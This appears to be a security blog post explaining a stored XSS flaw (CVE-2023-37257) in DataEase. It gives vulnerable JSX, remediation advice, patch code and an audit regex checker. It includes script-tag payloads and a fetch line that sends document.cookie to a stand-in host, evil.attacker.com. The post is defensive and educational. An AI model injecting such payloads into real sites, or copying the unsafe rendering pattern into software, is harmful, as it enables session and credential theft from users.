CVE-2023-37257 - DataEase Stored XSS Vulnerability Explained – Code Example, Exploit, and How to Stay Safe

Published: 2024-06-20
*Author: Security Insights Team*

What is CVE-2023-37257?

CVE-2023-37257 is a stored cross-site scripting (XSS) vulnerability found in DataEase, an open-source data visualization and analysis tool. It affects all versions of DataEase before v1.18.9. The flaw allows attackers to inject malicious scripts into dashboards or datasets. When legitimate users load these resources, their browsers may execute harmful JavaScript. The issue was patched in version 1.18.9.

Why Is This Vulnerability Dangerous?

- Stored XSS means injected attacks persist on the server, impacting everyone who loads the affected content.

How Does It Work?

The vulnerability exists because DataEase does not properly sanitize user input when creating or updating a dataset or dashboard panel name/description. Malicious JavaScript embedded in the input gets saved and loaded on subsequent page views.

Suppose a user creates a new Panel and sets the title to

<script>alert('Hacked!')</script>

1. An attacker with access to a DataEase instance inserts the payload above.

2. Later, any admin or user who loads the dashboard or dataset will see a popup showing "Hacked!"—that script could also do much worse, like stealing credentials.

Let's see how this might happen in practice (illustrative React-style JSX pseudo-code, not DataEase's actual source):

// In a vulnerable DataEase-like component
function Panel(props) {
    return <div>
        {/* 🚨 UNSAFE: the stored title is written into the DOM as raw HTML.
            A plain {props.panelTitle} expression would be escaped by React. */}
        <h2 dangerouslySetInnerHTML={{ __html: props.panelTitle }} />
        <div className="panel-data">{props.content}</div>
    </div>
}

If panelTitle was set to "<script>alert('Hacked!')</script>", the browser would execute the script.

1. Attacker logs in (or abuses a vulnerable endpoint via API).

2. Submits malicious JS payload as the name for a new Dataset/Panel.

Example Attack Payload

<script>
  // stray ';' removed so the snippet parses; sends the victim's cookies to the attacker's host
  fetch('https://evil.attacker.com/steal?cookie=' + document.cookie);
</script>

How Was It Fixed?

The developers patched the issue in v1.18.9 by sanitizing user-provided input:

Sample Patch Logic

import sanitizeHtml from 'sanitize-html';

// When saving input: strip every tag and attribute so only plain text is stored
panelTitle = sanitizeHtml(userInput.panelTitle, {allowedTags: [], allowedAttributes: {}});

// Render as plain text: React escapes interpolated strings, so never use dangerouslySetInnerHTML here
<h2>{panelTitle}</h2>

How to Stay Safe

1. Update to v1.18.9+ as soon as possible (see DataEase Releases).

2. Audit Existing Data

- Check existing panels/datasets for strange code or suspicious names.

3. Limit Access

- Make sure only trusted users can create or edit datasets/panels.
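As an added example (not DataEase's code) covering both the escape-on-output fix above and the audit step, this Node.js snippet escapes a stored title before it reaches the markup and scans constructed sample panel records for names containing markup; escapeHtml, renderPanelSafe, auditPanelNames and SAMPLE_PANELS are hypothetical names.

```javascript
// Added example (not DataEase's code): escape-on-output plus an audit
// check for stored panel/dataset names. Sample records are constructed.

// Escape the five characters that let text break out of an HTML context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: the stored title is concatenated straight into markup.
function renderPanelUnsafe(panelTitle) {
  return "<h2>" + panelTitle + "</h2>";
}

// Fixed pattern: the same title escaped before it reaches the markup.
function renderPanelSafe(panelTitle) {
  return "<h2>" + escapeHtml(panelTitle) + "</h2>";
}

// Audit heuristic for existing records: flag names that contain tags,
// inline event handlers or javascript: URLs. Review every hit by hand.
const SUSPICIOUS = [
  /<\s*\/?\s*[a-z][^>]*>/i,   // any HTML tag, e.g. <script>, <img ...>
  /\bon[a-z]+\s*=/i,          // inline handler such as onerror=
  /javascript\s*:/i,          // javascript: URL scheme
];

function auditPanelNames(panels) {
  return panels
    .filter((p) => SUSPICIOUS.some((re) => re.test(p.name)))
    .map((p) => p.id);
}

// Constructed sample of stored records, as an audit would read them back.
const SAMPLE_PANELS = [
  { id: 1, name: "Quarterly Sales" },
  { id: 2, name: "<script>alert('Hacked!')</script>" },
  { id: 3, name: "Revenue <img src=x onerror=alert(1)>" },
  { id: 4, name: "A & B comparison" },
];

// Usage: ids of records that need manual review
console.log(auditPanelNames(SAMPLE_PANELS)); // [2, 3]
```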

References

- CVE-2023-37257 at NVD
- DataEase GitHub
- Patch Release Notes v1.18.9

Conclusion

CVE-2023-37257 is a critical reminder to always validate and escape user input, especially in collaborative, data-focused applications like DataEase. If you use DataEase, upgrade right away to protect your team and data from stored XSS attacks.

Timeline

Published on: 07/25/2023 20:15:00 UTC
Last modified on: 08/01/2023 20:18:00 UTC